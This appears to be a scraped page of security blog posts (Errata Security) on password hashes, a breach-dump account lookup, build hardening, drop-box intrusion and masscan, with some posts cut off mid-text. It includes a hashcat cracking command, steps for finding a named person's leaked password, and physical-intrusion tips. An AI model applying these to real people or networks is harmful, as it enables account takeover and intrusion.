If these SIMs/phones are indeed because of spying, we would need additional evidence. A quick analysis of the accounts associated with the SIMs and of the contents of the phones should tell us whether she's a traveler or a spy.

Normal travelers may be concerned about hidden cameras. There's this story about Korean hotels filming guests, and this other one about ]]> 2019-04-21T17:16:36+00:00 https://blog.erratasec.com/2019/04/was-it-chinese-spy-or-confused-tourist.html www.secnews.physaphae.fr/article.php?IdArticle=1095316 False Malware None None Errata Security - Errata Security Assange indicted for breaking a password According to the US DoJ's press release:

Julian P. Assange, 47, the founder of WikiLeaks, was arrested today in the United Kingdom pursuant to the U.S./UK Extradition Treaty, in connection with a federal charge of conspiracy to commit computer intrusion for agreeing to break a password to a classified U.S. government computer.

The full indictment is here. It seems the indictment is based on already public information that came out during Manning's trial, namely this log of chats between Assange and Manning, specifically this section where Assange appears to agree to break a password. What this says is that Manning hacked a DoD computer and found the hash "80c11049faebf441d524fb3c4cd5351c" and asked Assange to crack it. Assange appears to agree.

So what is a "hash", what can Assange do with it, and how did Manning grab it?

Computers store passwords in an encrypted (sic) form called a "one way hash". Since it's "one way", it can never be decrypted. However, each time you log into a computer, it again performs the one way hash on what you typed in, and compares it with the stored version to see if they match. Thus, a computer can verify you've entered the right password, without knowing the password itself, or storing it in a form hackers can easily grab.
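The verify-by-rehashing idea above can be sketched in a few lines. This is an illustrative toy, not the actual NT/NTLM algorithms at issue: it uses SHA-1 and lowercase-only passwords purely for brevity.

```python
import hashlib
from itertools import product
from string import ascii_lowercase

def crack(target_hex, max_len=4):
    """Guess passwords, hash each guess the same one-way way the login
    check does, and compare against the stolen hash. The hash itself
    is never "decrypted"."""
    for length in range(1, max_len + 1):
        for letters in product(ascii_lowercase, repeat=length):
            guess = "".join(letters)
            if hashlib.sha1(guess.encode()).hexdigest() == target_hex:
                return guess
    return None  # search space exhausted without a match

stolen = hashlib.sha1(b"cab").hexdigest()  # pretend this hash was stolen
print(crack(stolen))  # recovers "cab" by brute force
```

The same loop run against a long, complex password simply never finds a match, which is why password length and complexity matter more than keeping the hash secret.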
Hackers can only steal the encrypted form, the hash. When they get the hash, while it can't be decrypted, hackers can keep guessing passwords, performing the one way algorithm on them, and seeing if they match. With an average desktop computer, they can test a billion guesses per second. This may seem like a lot, but if you've chosen a sufficiently long and complex password (more than 12 characters with letters, numbers, and punctuation), then hackers can't guess them.

It's unclear what format this password is in, whether "NT" or "NTLM". Using my notebook computer, I could attempt to crack the NT format using the hashcat password cracker with the following command:

hashcat -m 3000 -a 3 80c11049faebf441d524fb3c4cd5351c ?a?a?a?a?a?a?a

As this image shows, it'll take about 22 hours on my laptop to crack this. However, this doesn't succeed, so it seems that this isn't in the NT format. Unlike other password formats, the "NT" format can only be 7 characters in length, so we can completely crack it.]]> 2019-04-11T20:22:14+00:00 https://blog.erratasec.com/2019/04/assange-indicted-for-breaking-password.html www.secnews.physaphae.fr/article.php?IdArticle=1093008 False Hack None None Errata Security - Errata Security Some notes on the Raspberry Pi this article in my timeline today about the Raspberry Pi. I thought I'd write up some notes about it.

The Raspberry Pi costs $35 for the board, but to achieve a fully functional system, you'll need to add a power supply, storage, and heatsink, which ends up costing around $70 for the full system. At that price range, there are lots of alternatives. For example, you can get a fully functional $99 Windows x86 PC that's just as small and consumes less electrical power.

There are a ton of Raspberry Pi competitors, often cheaper with better hardware, such as an Odroid-C2, Rock64, Nano Pi, Orange Pi, and so on. There are also a bunch of "Android TV boxes" running roughly the same hardware for cheaper prices, that you can wipe and reinstall Linux on.
You can also acquire Android phones for $40.

However, while "better" technically, the alternatives all suffer from the fact that the Raspberry Pi is better supported -- vastly better supported. The ecosystem of ARM products focuses on getting Android to work, and does poorly at getting generic Linux working. The Raspberry Pi has the worst, most out-of-date hardware of any of its competitors, but I'm not sure I can wholly recommend any competitor, as they simply don't have the level of support the Raspberry Pi does.

The defining feature of the Raspberry Pi isn't that it's a small/cheap computer, but that it's a computer with a bunch of GPIO pins. When you look at the board, it doesn't just have the recognizable HDMI, Ethernet, and USB connectors, but also has 40 raw pins strung out across the top of the board. There are also a couple of extra connectors for cameras.

The concept wasn't simply that of a generic computer, but a maker device, for robot servos, temperature and weather measurements, cameras for a telescope, controlling Christmas light displays, and so on.

I think this is underemphasized in the above story. The reason it finds use in factories is because they have the same sorts of needs for controlling things that maker kids do. A lot of industrial needs can be satisfied by a teenager buying $50 of hardware off Adafruit and writing a few Python scripts.

On the other hand, support for industrial uses is nearly nonexistent. The reason commercial products cost $1000 is because somebody will answer your phone, unlike the teenager who's currently out at the movies with their friends.
However, with more and more people having experience with the Raspberry Pi, presumably you'll be able to hire generic consultants soon that can maintain th]]> 2019-03-12T18:43:41+00:00 https://blog.erratasec.com/2019/03/some-notes-on-raspberry-pi.html www.secnews.physaphae.fr/article.php?IdArticle=1066677 False Hack None None Errata Security - Errata Security A quick lesson in confirmation bias For example, take that "Trump-AlfaBank" theory. One of the oddities noted by researchers is lookups for "trump-email.com.moscow.alfaintra.net". One of the conspiracy theorists explains this as proof of human error, somebody "fat fingered" the wrong name when typing it in, thus proving humans were involved in trying to communicate between the two entities, as opposed to simple automated systems.

But that's because this "expert" doesn't know how DNS works. Your computer is configured to automatically put local suffixes on the end of names, so that you only have to look up "2ndfloorprinter" instead of a full name like "2ndfloorprinter.engineering.example.com". When looking up a DNS name, your computer may try to look up the name both with and without the suffix. Thus, sometimes your computer looks up "www.google.com.engineering.example.com" when it wants simply "www.google.com".

Apparently, Alfabank configures its Moscow computers to have the suffix "moscow.alfaintra.net". That means any DNS name that gets resolved will sometimes get this appended, so we'll sometimes see "www.google.com.moscow.alfaintra.net". Since we already know there were lookups from that organization for "trump-email.com", the fact that we also see "trump-email.com.moscow.alfaintra.net" tells us nothing new.

In other words, the conspiracy theorists didn't understand it, so they came up with their own explanation, and this confirmed their biases. In fact, there is a simpler explanation that neither confirms nor refutes anything. The reason for the DNS lookups for "trump-email.com" is still unexplained.
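The search-suffix behavior described above can be mimicked in a short sketch. The ndots logic here is a simplified model of what a resolv.conf-style stub resolver does, not any specific resolver implementation.

```python
def candidate_lookups(name, search_list, ndots=1):
    """Expand a name the way a stub resolver with a search list does:
    names with enough dots are tried as-is first, then with each
    configured suffix appended; bare names try the suffixes first."""
    suffixed = ["%s.%s" % (name, suffix) for suffix in search_list]
    if name.count(".") >= ndots:
        return [name] + suffixed
    return suffixed + [name]

# A desktop configured with the "moscow.alfaintra.net" suffix can thus
# emit a lookup for "trump-email.com.moscow.alfaintra.net" all by itself.
print(candidate_lookups("trump-email.com", ["moscow.alfaintra.net"]))
```

No human "fat fingering" is needed to produce the suffixed lookup; the resolver generates it automatically.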
Maybe they are because of something nefarious. The Trump organizations had all sorts of questionable relationships with Russian banks, so such a relationship wouldn't be surprising. But here's the thing: just because we can't come up with a simpler explanation doesn't make them proof of a Trump-Alfabank conspiracy. Until we know why those lookups were generated, they are an "unknown" and not "evidence".

The reason I write this post is because of this story about a student expelled due to "grade hacking". It sounds like this sort of situation, where the IT department saw anomalies it couldn't explain, so the anomalies became proof of the theory they'd created to explain them. Unexplained phenomena are unexplained. They are not evidence confirming your theory that explains them.]]> 2019-03-09T15:39:51+00:00 https://blog.erratasec.com/2019/03/a-quick-lesson-in-confirmation-bias.html www.secnews.physaphae.fr/article.php?IdArticle=1062312 False None None None Errata Security - Errata Security A basic question about TCP Remember that the telephone network was already a cyberspace before the Internet came around. It allowed anybody to create a connection to anybody else. Most circuits/connections were 56 kilobits per second; using the "T" system, these could be aggregated into faster circuits/connections. The "T1" line, consisting of 1.544 mbps, was an important standard back in the day.

In the phone system, when a connection is established, resources must be allocated in every switch along the path between the source and destination. When the phone system is overloaded, such as when you call loved ones when there's been an earthquake/tornado in their area, you'll sometimes get a message "No circuits are available". Due to congestion, it can't reserve the necessary resources in one of the switches along the route, so the call can't be established.

"Congestion" is important. Keep that in mind.
We'll get to it a bit further down.

The idea that each router needs to ACK a TCP packet means that the router needs to know about the TCP connection, that it needs to reserve resources for it. This was actually the original design of the OSI Network Layer.

Let's rewind a bit and discuss "OSI". Back in the 1970s, the major computer companies of the time all had their own proprietary network stacks. IBM computers couldn't talk to DEC computers, and neither could talk to Xerox computers. They all worked differently. The need for a standard protocol stack was obvious. To do this, the "Open Systems Interconnect" or "OSI" group was established under the auspices of the ISO, the international standards organization.

The first thing the OSI did was create a model for how protocol stacks would work. That's because different parts of the stack need to be independent from each other.

For example, consider the local/physical link between two nodes, such as between your computer and the local router, or your router to the next router. You use Ethernet or WiFi to talk to your router. You may use 802.11n WiFi in the 2.4GHz band, or 802.11ac in the 5GHz band. However you do this, it doesn't matter as far as the TCP/IP packets are concerned. This is just between you and your router, and all the information is stripped out of the packets before they are forwarded across the Internet.

Likewise, your ISP may use cable modems (DOCSIS) to connect your router to their routers, or they may use xDSL. This information is likewise stripped off before packets go further into the Internet. When your packets reach the other end, like at Google's servers, they contain no traces of this.

There are 7 layers to the OSI model. The one we are most interested in is layer 3, the "Network Layer". This is the layer at which IPv4 and IPv6 operate. TCP is layer 4, the "Transport Layer". The original idea for the network layer was that it would be connection oriented, modeled after the phone system.
The phone system was already offering such a service, called X.25, which the OSI model was built around. X.25 was important in the pre-Internet era for creating long-distance computer connections, allowing cheaper connections than renting a full T1 circuit from the phone company. Normal telephone circuits are designed for a continuous flow of data, whereas computer communication is bursty. X.25 was especially popular for terminals, because it only needed to send packets from the terminal when users were typing.

Layer 3 also included]]> 2019-02-25T18:20:47+00:00 https://blog.erratasec.com/2019/02/a-basic-question-about-tcp.html www.secnews.physaphae.fr/article.php?IdArticle=1041758 False None None None Errata Security - Errata Security How Bezo's dick pics might've been exposed government agents or the "deep state" were involved in this sordid mess. The more likely explanation is that it was a simple hack. Teenage hackers regularly do such hacks -- they aren't hard. This post is a description of how such hacks might've been done.

To start with, from which end were they stolen? As a billionaire, I'm guessing Bezos himself has pretty good security, so I'm going to assume it was the recipient, his girlfriend, who was hacked.

The hack starts by finding the email address she uses. People use the same email address for both public and private purposes. There are lots of "people finder" services on the Internet that you can use to track this information down. These services are partly scams, using "dark patterns" to get you to spend tons of money on them without realizing it, so be careful.

Using one of these sites, I quickly found a couple of email accounts she's used, one at HotMail, another at GMail. I've blocked out her address; I want to describe how easy the process is, I'm not trying to doxx her.

Next, I enter those email addresses into the website http://haveibeenpwned.com to see if hackers have ever stolen her account password.
When hackers break into websites, they steal the account passwords, and then exchange them on the dark web with other hackers. The above website tracks this, helping you discover if one of your accounts has been so compromised. You should take this opportunity to enter your email address in this site to see if it's been so "pwned".

I find that her email addresses have been included in that recent dump of 770 million accounts called "Collection#1". The http://haveibeenpwned.com site won't disclose the passwords, only the fact they've been pwned. However, I have a copy of that huge Collection#1 dump, so I can search it myself to get her password. As this output shows, I get a few hits, all with the same password.

At this point, I have a password, but not necessarily the password to access any useful accounts. For all I know, this was the ]]> 2019-02-08T10:08:18+00:00 https://blog.erratasec.com/2019/02/how-bezos-dick-pics-mightve-been-exposed.html www.secnews.physaphae.fr/article.php?IdArticle=1020132 False Hack None None Errata Security - Errata Security Passwords in a file http://haveibeenpwned.com and entering your email address. Entering my dad's email address, I find that his accounts at Adobe, LinkedIn, and Disqus have been discovered by hackers (due to hacks of those websites) and published. I sure hope that whatever these passwords were, they are not the same as or similar to his passwords for GMail or his bank account.
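As an aside on checking yourself safely: the Pwned Passwords side of the service uses a k-anonymity scheme, where only the first five hex characters of your password's SHA-1 ever leave your machine, and the matching against the returned suffixes happens locally. A minimal sketch of that split (no network call is made here):

```python
import hashlib

def hibp_range_parts(password):
    """Split a password's SHA-1 into the 5-character prefix sent to the
    Pwned Passwords range API and the 35-character suffix matched
    locally, so the full hash never leaves your machine."""
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    return digest[:5], digest[5:]

prefix, suffix = hibp_range_parts("password")
print(prefix)  # only this prefix would be sent to the range endpoint
```

The server returns every suffix it knows for that prefix, and your own code checks whether yours is among them.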
* the lame joke at the top was my dad's, so don't blame me :-)]]>
2019-01-28T22:21:56+00:00 https://blog.erratasec.com/2019/01/passwords-in-file.html www.secnews.physaphae.fr/article.php?IdArticle=1012937 False Hack None None
Errata Security - Errata Security Notes on Build Hardening a paper about "build safety" in consumer products, describing how software is built to harden it against hackers trying to exploit bugs.

What is build safety?

Modern languages (Java, C#, Go, Rust, JavaScript, Python, etc.) are inherently "safe", meaning they don't have "buffer-overflows" or related problems. However, C/C++ is "unsafe", and is the most popular language for building stuff that interacts with the network. In other cases, while the language itself may be safe, it'll use underlying infrastructure ("libraries") written in C/C++. When we are talking about hardening builds, making them safe or secure, we are talking about C/C++.

In the last two decades, we've improved both hardware and operating systems around C/C++ in order to impose safety on it from the outside. We do this with options when the software is built (compiled and linked), and then when the software is run. That's what the paper above looks at: how consumer devices are built using these options, and thereby, measuring the security of these devices.

In particular, we are talking about the Linux operating system here and the GNU compiler gcc. Consumer products almost always use Linux these days, though a few also use embedded Windows or QNX. They are almost always built using gcc, though some are built using a clone known as clang (or llvm).

How software is built

Software is first compiled, then linked. Compiling means translating the human-readable source code into machine code. Linking means combining multiple compiled files into a single executable.

Consider a program hello.c. We might compile it using the following command:

gcc -o hello hello.c

This command takes the file, hello.c, compiles it, then outputs (-o) an executable with the name hello. We can set additional compilation options on the command-line here.
For example, to enable stack guards, we'd compile with a command that looks like the following:

gcc -o hello -fstack-protector hello.c

In the following sections, we are going to look at specific options and what they do.

Stack guards

A running program has various kinds of memory, optimized for different use cases. One chunk of memory is known as the stack. This is the scratch pad for functions. When a function in the code is called, the stack grows with the additional scratchpad needs of that function, then shrinks back when the function exits. As functions call other functions, which call other functions, the stack keeps growing larger and larger. When they return, it then shrinks back again.

The scratch pad for each function is known as the stack frame. Among the things stored in the stack frame is the return address, where the function was called from, so that when it exits, the caller of the function can continue executing where it left off.

The way stack guards work is to stick a carefully constructed value in between each stack frame, known as a canary. Right before the function exits, it'll check this canary in order to validate it hasn't been corrupted. If corruption is detected, the program exits, or crashes, to prevent worse things from happening. This solves the most common exploited vulnerability in C/C++ code, the stack buffer-overflow. This is the bug described in that famous paper Smashing the Stack for Fun and Profit&]]> 2018-12-15T22:40:22+00:00 https://blog.erratasec.com/2018/12/notes-on-build-hardening.html www.secnews.physaphae.fr/article.php?IdArticle=948435 False Guideline None None Errata Security - Errata Security Notes about hacking with drop tools DarkVishnya). I thought I'd write up some more detailed notes on this.

Drop tools

A common hacking/pen-testing technique is to drop a box physically on the local network. On this blog, there are articles going back 10 years discussing this.
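To make the stack-canary idea described above concrete, here is a toy simulation. The real mechanism is compiler-generated machine code operating on the C stack; this Python sketch only models the frame layout and the check.

```python
import os

CANARY = os.urandom(8)  # a random value, like the one gcc places in each frame

def make_frame(buf_size):
    # toy stack frame layout: [ buffer | canary ]
    return bytearray(buf_size) + bytearray(CANARY)

def unsafe_copy(frame, data):
    # no bounds check, like strcpy(): long input scribbles past the buffer
    frame[:len(data)] = data

def canary_intact(frame):
    # the check -fstack-protector inserts right before a function returns
    return bytes(frame[-8:]) == CANARY

frame = make_frame(16)
unsafe_copy(frame, b"A" * 24)   # 8 bytes past the 16-byte buffer
print(canary_intact(frame))     # False: corruption detected, so abort
```

A write that stays within the 16-byte buffer leaves the canary untouched and the check passes; an overflow long enough to reach the return address must trample the canary first, which is the whole trick.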
In the old days, this was done with a $200 "netbook" (a cheap notebook computer). These days, it can be done with $50 "Raspberry Pi" computers, or even $25 consumer devices reflashed with Linux.

A "Raspberry Pi" is a $35 single board computer, for which you'll need to add about another $15 worth of stuff to get it running (power supply, flash drive, and cables). These are extremely popular hobbyist computers that are used everywhere from home servers to robotics and hacking. They have spawned a large number of clones, like the ODROID, Orange Pi, NanoPi, and so on. With a quad-core, 1.4 GHz, single-issue processor, 2 gigs of RAM, and typically at least 8 gigs of flash, these are pretty powerful computers.

Typically what you'd do is install Kali Linux. This is a Linux "distro" that contains all the tools hackers want to use. You then drop this box physically on the victim's network. We often called these "dropboxes" in the past, but now that there's a cloud service called "Dropbox", this becomes confusing, so I guess we can call them "drop tools". The advantage of using something like a Raspberry Pi is that it's cheap: once dropped on a victim's network, you probably won't ever get it back again.

Gaining physical access to even secure banks isn't that hard. Sure, getting to the money is tightly controlled, but other parts of the bank aren't nearly as secure. One good trick is to pretend to be a banking inspector. At least in the United States, they'll quickly bend over and spread them if they think you are a regulator. Or, you can pretend to be a maintenance worker there to fix the plumbing. All it takes is a uniform with a logo and what appears to be a valid work order. If questioned, whip out the clipboard and ask them to sign off on the work. Or, if all else fails, just walk in brazenly as if you belong.

Once inside the physical network, you need to find a place to plug something in. Ethernet and power plugs are often underneath/behind furniture, so that's not hard.
You might find access to a wiring closet somewhere, as Aaron Swartz famously did. You'll usually have to connect via Ethernet, as it requires no authentication/authorization. If you could connect via WiFi, you could probably do it outside the building using directional antennas, without going through all this.

Now that you've got your evil box installed, there is the question of how you remotely access it. It's almost certainly firewalled, preventing any inbound connection. One choice is to configure it for outbound connections. When doing pentests, I configure reverse SSH command-prompts to a command-and-control server. Another alternative is to create a SSH Tor hidden service. There are a myriad of other ways you might do this. They all suffer the problem that anybody looking at the organization's outbound traffic can notice these connections.

Another alternative is to use the WiFi. This allows you to physically sit outside in the parking lot and connect to the box. This can sometimes be detected using WiFi intrusion prevention systems, though it's not hard to get around that. The downside is that it puts you in some physical jeopardy, because you have to be physically near the building. However, you can mitigate this in some cases, such as sticking a second Raspberry Pi in a nearby bar that is close enough to connect, and then using the bar's Internet connection to hop-scotch on in.]]> 2018-12-11T22:59:55+00:00 https://blog.erratasec.com/2018/12/notes-about-hacking-with-drop-tools.html www.secnews.physaphae.fr/article.php?IdArticle=942988 False Vulnerability None None Errata Security - Errata Security Some notes about HTTP/3 SPDY (HTTP/2) is already supported by the major web browsers (Chrome, Firefox, Edge, Safari) and major web servers (Apache, Nginx, IIS, CloudFlare). Many of the most popular websites support it (even non-Google ones), though you are unlikely to ever see it on the wire (sniffing with Wireshark or tcpdump), because it's always encrypted with SSL.
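Returning to the drop-box access problem above: the outbound reverse-SSH trick amounts to one command the box runs on boot. A sketch of building that command, where the host, user, and ports are hypothetical placeholders, not anything from a real engagement:

```python
def reverse_tunnel_cmd(c2_host, c2_user="operator", remote_port=2222, local_port=22):
    """Build an OpenSSH invocation that dials out from the drop box and
    exposes its own SSH daemon (local_port) as remote_port on the
    command-and-control host (-R = remote forward, -N = no command),
    so the victim's firewall only ever sees an outbound connection."""
    return ("ssh -N -R %d:localhost:%d %s@%s"
            % (remote_port, local_port, c2_user, c2_host))

print(reverse_tunnel_cmd("c2.example.com"))
# ssh -N -R 2222:localhost:22 operator@c2.example.com
```

From the C&C host, `ssh -p 2222 localhost` then lands on the drop box, which is exactly the traffic pattern that outbound-traffic monitoring can catch.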
While the standard allows for HTTP/2 to run raw over TCP, all the implementations only use it over SSL.

There is a good lesson here about standards. Outside the Internet, standards are often de jure, run by government, driven by getting all major stakeholders in a room and hashing it out, then using rules to force people to adopt it. On the Internet, people implement things first, and then if others like it, they'll start using it, too. Standards are often de facto, with RFCs being written for what is already working well on the Internet, documenting what people are already using. SPDY was adopted by browsers/servers not because it was standardized, but because the major players simply started adding it. The same is happening with QUIC: the fact that it's being standardized as HTTP/3 is a reflection that it's already being used, rather than some milestone that now that it's standardized that people can start using it.

QUIC is really more of a new version of TCP (TCP/2???) than a new version of HTTP (HTTP/3). It doesn't really change what HTTP/2 does so much as change how the transport works. Therefore, my comments below are focused on transport issues rather than HTTP issues.

The major headline feature is faster connection setup and lower latency. TCP requires a number of packets being sent back-and-forth before the connection is established. SSL again requires a number of packets sent back-and-forth before encryption is established. If there is a lot of network delay, such as when people use satellite Internet with half-second ping times, it can take quite a long time for a connection to be established. By reducing round-trips, connections get set up faster, so that when you click on a link, the linked resource pops up immediately.

The next headline feature is bandwidth. There is always a bandwidth limitation between the source and destination of a network connection, which is almost always due to congestion.
Both sides need to discover this speed so that they can send packets at just the right rate. Sending packets too fast, so that they'll get dropped, causes even more congestion for others without improving the transfer rate. Sending packets too slowly means suboptimal use of the network.

How HTTP traditionally does this is bad. Using a single TCP connection didn't work for HTTP because interactions with websites require multiple things to be transferred simultaneously, so browsers opened multiple connections to the web server (typically 4). However, this breaks the bandwidth estimation, because each of your TCP connections is trying to do it independently as if the other connections don't exist. SPDY addressed this by its multiplexing feature that combined multiple interactions between browser/server with a single bandwidth calculation.

QUIC extends this multiplexing, making it even easier to handle multiple interactions between the browser/server, without any one interaction blocking another, but with a common bandwidth estimation. This will make interactions smoother from a user's perspective, while ]]> 2018-11-18T19:51:36+00:00 https://blog.erratasec.com/2018/11/some-notes-about-http3.html www.secnews.physaphae.fr/article.php?IdArticle=905495 False None None None Errata Security - Errata Security Brian Kemp is bad on cybersecurity failed hacking attempt".

According to news stories, state elections websites are full of common vulnerabilities, those documented by the OWASP Top 10, such as "direct object references" that would allow any election registration information to be read or changed, allowing a hacker to cancel the registrations of voters of the other party.

Testing for such weaknesses is not a crime. Indeed, it's desirable that people can test for security weaknesses. Systems that aren't open to test are insecure.
This concept is the basis for many policy initiatives at the federal level, to not only protect researchers probing for weaknesses from prosecution, but to even provide bounties encouraging them to do so. The DoD has a "Hack the Pentagon" initiative encouraging exactly this.

But the State of Georgia is stereotypically backwards and thuggish. Earlier this year, the legislature passed SB 315, which criminalized this activity of merely attempting to access a computer without permission, to probe for possible vulnerabilities. To the ignorant and backwards person, this seems reasonable; of course this bad activity should be outlawed. But as we in the cybersecurity community have learned over the last decades, this only outlaws your friends from finding security vulnerabilities, and does nothing to discourage your enemies. Russian election-meddling hackers are not deterred by such laws, only Georgia residents concerned whether their government websites are secure.

It's your own users, and well-meaning security researchers, who are the primary source for improving security. Unless you live under a rock (like Brian Kemp, apparently), you'll have noticed that every month you have your Windows desktop or iPhone nagging you about updating the software to fix security issues. If you look behind the scenes, you'll find that most of these security fixes come from outsiders. They come from technical experts who accidentally come across vulnerabilities. They come from security researchers who specifically look for vulnerabilities.

It's because of this "research" that systems are mostly secure today. A few days ago was the 30th anniversary of the "Morris Worm" that took down the nascent Internet in 1988. The net of that time was hostile to security research, with major companies ignoring vulnerabilities. Systems then were laughably insecure, but vendors tried to address the problem by suppressing research.
The Morris Worm exploited several vulnerabilities that were well-known at the time, but ignored by the vendor (in this case, primarily Sun Microsystems). Since then, with a culture of outsiders disclosing vulnerabilities, vendors have been pressured into fixing them. This has led to vast improvements in security. I'm posting this from a public WiFi hotspot in a bar, for example, because computers are secure enough for this to be safe. 10 years ago, such activity wasn't safe.

The Georgia Democrats obviously have concerns about the integrity of election systems. They have every reason to thoroughly probe an elections website looking for vulnerabilities. This sort of activity should be encouraged, not supp]]> 2018-11-04T18:22:46+00:00 https://blog.erratasec.com/2018/11/brian-kemp-is-bad-on-cybersecurity.html www.secnews.physaphae.fr/article.php?IdArticle=879735 False Vulnerability,Threat,Guideline None None Errata Security - Errata Security Why no cyber 9/11 for 15 years? hasn't there been a cyber-terrorist attack for the last 15 years, or as it phrases it:

National-security experts have been warning of terrorist cyberattacks for 15 years. Why hasn't one happened yet?

As a pen-tester who's broken into power grids and found 0day exploits in control center systems, I thought I'd write up some comments.

Instead of asking why one hasn't happened yet, maybe we should instead ask why national-security experts keep warning about them. One possible answer is that national-security experts are ignorant. I get the sense that "national security experts" have very little expertise in cyber. That's why I include a brief resume at the top of this article: I've actually broken into a power grid and found 0days in critical power grid products (specifically, the ABB implementation of ICCP on AIX -- it's rather an obvious buffer-overflow, *cough* ASN.1 *cough*, I don't know if they ever fixed it).

Another possibility is that they are fear mongering in order to support their agenda.
That's the problem with "experts": they get their expertise by being employed to achieve some goal. The ones who know most about an issue are simultaneously the ones most biased about an issue. They have every incentive to make people afraid, and little incentive to tell the truth.

The most likely answer, though, is simply because they can. Anybody can warn of a "digital 9/11" and be taken seriously, regardless of expertise. They'll get all the press. It's always the Morally Right thing to say. You never have to back it up with evidence. Conversely, those who say the opposite don't get the same level of press, and are frequently challenged to defend their abnormal stance.

Indeed, that's how this article by The Atlantic works. Its entire premise is that the national security experts are still "right" even though their predictions haven't happened, and it's reality that's "wrong".

Now let's consider the original question.

One good answer in the article is that such attacks "cause certain types of fear and terror, that garner certain media attention, that galvanize followers". Blowing something up causes more fear in the target population than deleting some data.

But the same is true of the terrorists themselves: they prefer violence. In other words, what motivates terrorists, the ends or the means? Is it the need to achieve a political goal? Or is it simply about looking for an excuse to commit violence?

I suspect that it's the latter. It's not that terrorists are violent so much as violent people are attracted to terrorism. This can explain a lot, such as why they have such poor op-sec and encryption, as I've written about before. They enjoy learning how to shoot guns and trigger bombs, but they don't enjoy learning how to use a computer correctly.

I've explored the cyber Islamic dark web and come to a couple conclusions about it. The primary motivation of these hackers is gay porn.
A frequent initiation rite to gain access to these forums is to post pictures of your, well, equipment. Such things are repressed in their native countries and societies, so hacking becomes a necessary skill in order to get it.

It's hard for us to understand their motivations. From our western perspective, we'd think gay young men would be on our side, motivated to fight against their own governments in defense of gay rights, in order to achieve marriage equality. None of them want that. Their goal is to get married and have children. Sure, they want gay sex and intimate relationships with men, but they also want a subservient wife who manages the household, and the deep family ties that …

(2018-11-02, https://blog.erratasec.com/2018/11/why-no-cyber-911-for-15-years.html)

Masscan and massive address lists

"@nmap scanning with big exclusion lists, things are about to get a lot faster. ;)" -- Daniel Miller ✝ (@bonsaiviking), November 1, 2018

Both nmap and masscan are port scanners. The difference is that nmap does an intensive scan on a limited range of addresses, whereas masscan does a light scan on a massive range of addresses, including the range of 0.0.0.0 - 255.255.255.255 (all addresses). If you've got a 10-gbps link to the Internet, it can scan the entire thing in under 10 minutes, from a single desktop-class computer.

How masscan deals with exclude ranges is probably its defining feature. That seems kinda strange, since it's a little-used feature in nmap. But when you scan the entire Internet, people will complain, with nasty emails, so you are going to build up a list of hundreds, if not thousands, of addresses to exclude from your scans.

Therefore, the first design choice is to combine the two lists, the list of targets to include and the list of targets to exclude.
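A minimal sketch of that combination step: subtracting one exclude range from a sorted array of target ranges. The struct layout and function name here are hypothetical, for illustration only (masscan's real code handles far more cases); it also assumes the array has room for one extra entry, since an exclusion can split a range in two.

```c
#include <stdint.h>
#include <stddef.h>

struct range {
    uint32_t begin; /* first IP address, inclusive */
    uint32_t end;   /* last IP address, inclusive */
};

/* Remove `ex` from the sorted list `targets`, in place.
 * Returns the new count. Simplified sketch: ignores 32-bit
 * edge cases like ex.end == 255.255.255.255. */
size_t exclude_range(struct range *targets, size_t count, struct range ex)
{
    size_t i = 0;
    while (i < count) {
        struct range *t = &targets[i];
        if (ex.end < t->begin || ex.begin > t->end) {
            i++; /* no overlap with this range */
        } else if (ex.begin <= t->begin && ex.end >= t->end) {
            /* exclude swallows the whole range: delete it */
            for (size_t j = i; j + 1 < count; j++)
                targets[j] = targets[j + 1];
            count--;
        } else if (ex.begin > t->begin && ex.end < t->end) {
            /* exclude punches a hole: split into two ranges */
            for (size_t j = count; j > i + 1; j--)
                targets[j] = targets[j - 1];
            targets[i + 1].begin = ex.end + 1;
            targets[i + 1].end = t->end;
            t->end = ex.begin - 1;
            count++;
            i += 2;
        } else if (ex.begin <= t->begin) {
            t->begin = ex.end + 1; /* trim the front */
            i++;
        } else {
            t->end = ex.begin - 1; /* trim the back */
            i++;
        }
    }
    return count;
}
```

Running every exclude range through this yields a single clean list of target ranges, which is what makes the random-index trick described next possible.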
Other port scanners don't do this because they typically work from a large include list and a short exclude list, so they optimize for the larger thing. In mass scanning the Internet, the exclude list is the largest thing, so that's what we optimize for. It makes sense to just combine the two lists.

So the performance question now isn't how to look up an address in an exclude list efficiently, it's how to quickly choose a random address from a large include target list.

Moreover, the decision is how to do it with as little state as possible. That's the trick for sending massive numbers of packets at rates of 10 million packets per second: not keeping any bookkeeping of what was scanned. I'm not sure exactly how nmap randomizes its addresses, but the documentation implies that it does a block of addresses at a time, and randomizes that block, keeping state on which addresses it's scanned and which ones it hasn't.

The way masscan works is not to randomly pick an IP address so much as to randomize the index.

To start with, we create a sorted list of IP address ranges, the targets. The total number of IP addresses in all the ranges is target_count (not the number of ranges but the number of all IP addresses). We then define a function pick() that returns one of those IP addresses given the index:

    ip = pick(targets, index);

Where index is in the range [0..target_count).

This function is just a binary search. After the ranges have been sorted, a start_index value is added to each range, which is the total number of IP addresses up to that point. Thus, given a random index, we search the list of start_index values to find which range we've chosen, and then which IP address within that range. The function is here, though reading it, I realize I need to refactor it to make it clearer.
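The pick() function described above can be sketched as a binary search over the start_index values. The struct layout below is hypothetical, chosen to illustrate the idea rather than mirror masscan's actual code:

```c
#include <stdint.h>
#include <stddef.h>

struct range {
    uint32_t begin;       /* first IP address in the range */
    uint32_t end;         /* last IP address in the range (inclusive) */
    uint64_t start_index; /* count of addresses in all earlier ranges */
};

/* Binary-search the sorted ranges for the one containing `index`,
 * then offset into that range to get the IP address. */
uint32_t pick(const struct range *targets, size_t count, uint64_t index)
{
    size_t lo = 0, hi = count;
    while (lo + 1 < hi) {
        size_t mid = (lo + hi) / 2;
        if (targets[mid].start_index <= index)
            lo = mid; /* index lies in this range or a later one */
        else
            hi = mid; /* index lies in an earlier range */
    }
    return targets[lo].begin + (uint32_t)(index - targets[lo].start_index);
}
```

Feed it indexes 0 through target_count-1 in any order and it returns each target address exactly once, which is why randomizing the index is equivalent to randomizing the addresses.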
(I read the comments telling me to refactor it, and I realize I haven't gotten around to that yet :-).

Given this system, we can now do an in-order (not randomized) port scan by doing the following …

(2018-11-01, https://blog.erratasec.com/2018/11/masscan-and-massive-address-lists.html)

Systemd is bad parsing and should feel bad

In the late 1990s and early 2000s, we learned that parsing input is a problem. The traditional ad hoc approach you were taught in school is wrong. It's wrong from an abstract theoretical point of view. It's wrong from the practical point of view, error prone and leading to spaghetti code.

